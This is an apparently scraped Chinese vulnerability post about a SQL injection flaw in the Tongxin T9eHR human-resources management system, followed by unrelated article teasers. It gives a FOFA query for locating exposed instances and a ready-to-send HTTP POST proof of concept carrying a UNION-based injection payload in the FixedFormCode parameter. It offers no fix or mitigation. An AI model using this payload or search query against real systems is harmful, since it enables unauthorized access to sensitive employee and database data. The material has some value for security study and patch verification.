同鑫T9eHR信息华管理系统GetDropDownListItems存在SQL注入漏洞

embedded/2024/9/24 23:26:15/

漏洞描述:

广州同鑫科技有限公司是专业从事人力资源管理系统、eHR/OA一体化智慧云平台、智慧一卡通云平台、行业软件开发与定制、智慧企业管理信息化咨询与项目服务为核心业务的顾问式管理咨询和软件个性定制开发的高科技股份集团公司。广州同鑫科技有限公司同鑫T9eHR信息华管理系统GetDropDownListItems存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

 

FOFA:

body="T9eHR"

漏洞复现 

POC:

POST /Common/GetFlowDropDownListItems HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 33FixedFormCode=1%27+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28109%29%2BCHAR%28107%29%2BCHAR%2886%29%2BCHAR%2897%29%2BCHAR%2897%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2879%29%2BCHAR%28111%29%2BCHAR%2898%29%2BCHAR%2871%29%2BCHAR%2871%29%2BCHAR%2876%29%2BCHAR%2865%29%2BCHAR%2868%29%2BCHAR%28103%29%2BCHAR%2880%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%2871%29%2BCHAR%28114%29%2BCHAR%2898%29%2BCHAR%2873%29%2BCHAR%28112%29%2BCHAR%28115%29%2BCHAR%2882%29%2BCHAR%28112%29%2BCHAR%28116%29%2BCHAR%2889%29%2BCHAR%28120%29%2BCHAR%2884%29%2BCHAR%28104%29%2BCHAR%2881%29%2BCHAR%28121%29%2BCHAR%28119%29%2BCHAR%28108%29%2BCHAR%28117%29%2BCHAR%28111%29%2BCHAR%28120%29%2BCHAR%28117%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29--+AHRN

sqlmap:

 


http://www.ppmy.cn/embedded/102752.html

相关文章

<Godot>工厂游戏练习笔记一<2D网格地图>

1、编写网格数据类,用于存储网格地图中的数据: class_name Grid2D_Data## 单元格数据,传入一个场景 var data:Resource:set(val):if val ! null:data val ## 网格长宽 var grid_size:Vector2i Vector2i(10,10):set(val):if val:grid_size val ## 网格…

区块链(币圈)常用网址大全

交易所 中心化交易所 币安(Binance):https://www.binance.com/ Coinbase Exchange:https://www.coinbase.com/ Bybit:https://www.bybit.com/ 欧意(OKX):https://www.okx.com/ …

常用的银行卡验证API接口有哪些?

常用的银行卡验证API接口主要包括以下几类,这些接口广泛应用于银行、金融、电商、证券等行业,用于对银行卡信息的真伪进行核验: 银行卡二要素验证 入参:姓名、银行卡号。 结果返回:一致或不一致。银行卡三要素验证 入…

apache的主要目录结构及常见的配置选项的详细说明(图例展示)

主要目录和文件 路径说明/usr/local/httpd/httpd服务主目录,安装路径/usr/local/httpd/bin/存储httpd服务的命令/usr/local/httpd/cgi-bin存放第三方程序的执行文件/usr/local/httpd/conf/存放httpd服务的配置文件/usr/local/httpd/conf/extra/存放扩展配置文件/us…

C#从入门到精通(20)—C#目录类Directory用法总结

前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家!人工智能学习网站 前言: 大家好,我是上位机马工,硕士毕业4年年入40万,目前在一家自动化公司担任…

豆包 API 调用示例代码详解-Python版

文章目录 豆包 API 调用示例代码详解-Python版一、事前准备二、所需 Python 包三、代码详解五、源码下载四、总结豆包官方API文档 豆包 API 调用示例代码详解-Python版 在本文中,我们将详细介绍如何使用 Python 调用豆包 API,并提供相关的事前准备和代码…

[C++]深入理解C++中的泛型编程、函数模板与类模板

C 以其强大的模板功能和泛型编程(Generic Programming)特性而闻名。模板不仅提高了代码的重用性,还大大增强了编程的灵活性。本文将详细介绍C中的泛型编程,以及与之密切相关的函数模板和类模板。 1. 泛型编程概述 泛型编程是一种…

AMBA协议中的AXI-Stream:协议信号与设计实践

在高性能嵌入式系统设计中,AMBA(Advanced Microcontroller Bus Architecture)协议扮演着重要角色。其中,AXI-Stream协议是AMBA 4.x规范的一部分,专为高吞吐量数据传输而设计,广泛应用于视频处理、音频处理、…